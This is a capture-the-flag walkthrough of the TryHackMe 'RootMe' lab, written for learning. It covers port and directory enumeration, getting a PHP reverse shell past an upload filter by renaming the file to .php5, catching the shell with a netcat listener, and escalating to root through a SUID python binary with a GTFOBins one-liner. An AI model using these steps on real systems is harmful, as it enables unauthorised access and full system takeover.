RootMe

Introduction

First lets start the machine.

Task 2Reconnaissance

Let’s scan the ports with nmap We found 2 ports, and 2 service’s running, ssh & http

nmap -sCV 10.10.92.239

-sCV

1. Scan for open ports
2. identifies the services running on those ports.
3. Executes default NSE scripts.
4. Retrieves banners and configuration details

Let’s go to enumerate the server with gobuster

1. gobuster dir -u “http://10.10.1.104/” -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
2. gobuser Calls gobuster
3. dir -u url scans of directory and define the url
4. -w Path to the wordlist
5. /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt its the wordlists that i choose

Reconnaissance answer

Task 3 Getting a shell

Find a form to upload and get a reverse shell, and find the flag. Let’s go to the target machine 10.10.1.104 Mine is this one, the Browser displays this

Tryhackme says this Search for "file upload bypass" and "PHP reverse shell".

And then let’s go to https://pentestmonkey.net/tools/web-shells/php-reverse-shell if you want download the file, or copy that. Now let’s edit the reverse-shell.php

1. $ip = ‘127.0.0.1’; // CHANGE THIS For the Attackbox, or ovpn
2. $port = 1234; // CHANGE THIS whatever you want.

After that, try to upload the file, example shell.php and return this error it’s because is not permit php (1), then let’s try to rename the file from shell.php to shell.php5 There is two way’s to change the name of the file, One is by the terminal typing this

mv shell.php shell.php5

With that now its works But I like tu use BurpSuite With burp suite we catch the request, and edit that. Note: You have to know basic knowledges of burpsuite to do this. Let’s catch the Request After that we have to add a 5 at the end shell.php5 Have to be like this

And then Click on Forward Like 3 times and the file will be upload. The browser shows this when the file was upload susccefull

Now Let's Configure a Listener to get the reverse shell

nc -nlvp 4444

nc calls netcat

1. n Avoids netcat dns resolution
2. l Puts Netcat in listening mode, waiting for incoming connections.

3. v Enables Verbose mode

   More details

4. p Specifies the port to listen on
5. 4444 The chosen port number.

Now That we got a port listening & the file on the web site

Go to /uploads and click on shell.php5

We got a reverse shell

 Type this command, `find / -name "user.txt" 2>/dev/null`
 that will return
 path/to/user.txt

find: Command to search for files and directories in the filesystem.
/: Specifies the search starts from the root directory (/) and includes all subdirectories.
-name "user.txt": Searches for a file or directory named user.txt.
2>/dev/null: Redirects error messages to /dev/null, ignoring them (e.g., "Permission denied").

 After you find the file user.txt, type 
 cat path/to/user.txt  and you will get the flag

Task 4 Privilege Escalation

Now that we have a shell, let's escalate our privileges to root.

Tryhackme says this, Search for files with SUID permission, which file is weird?
Then type this. find / -user root -perm /4000
find: Searches for files and directories.
/: Starts the search from the root directory (/) and its subdirectories.
-user root: Filters for files owned by the root user.
-perm /4000: Searches for files with the SUID permission set (4000), allowing them to run

There is a lot of suid, but we found some important

/usr/bin/python

After we found the suid, go to https://gtfobins.github.io/ In the search type python And there is some options, but take this

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Now go to the terminal and use the command to escalate the privileges.

/usr/bin/./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

As you can see I put a commmand

whoami 
This identified who you are in the terminal.|  normal user  or root

#!/bin/bash
echo "If there are any grammatical errors, sorry Im learning english :)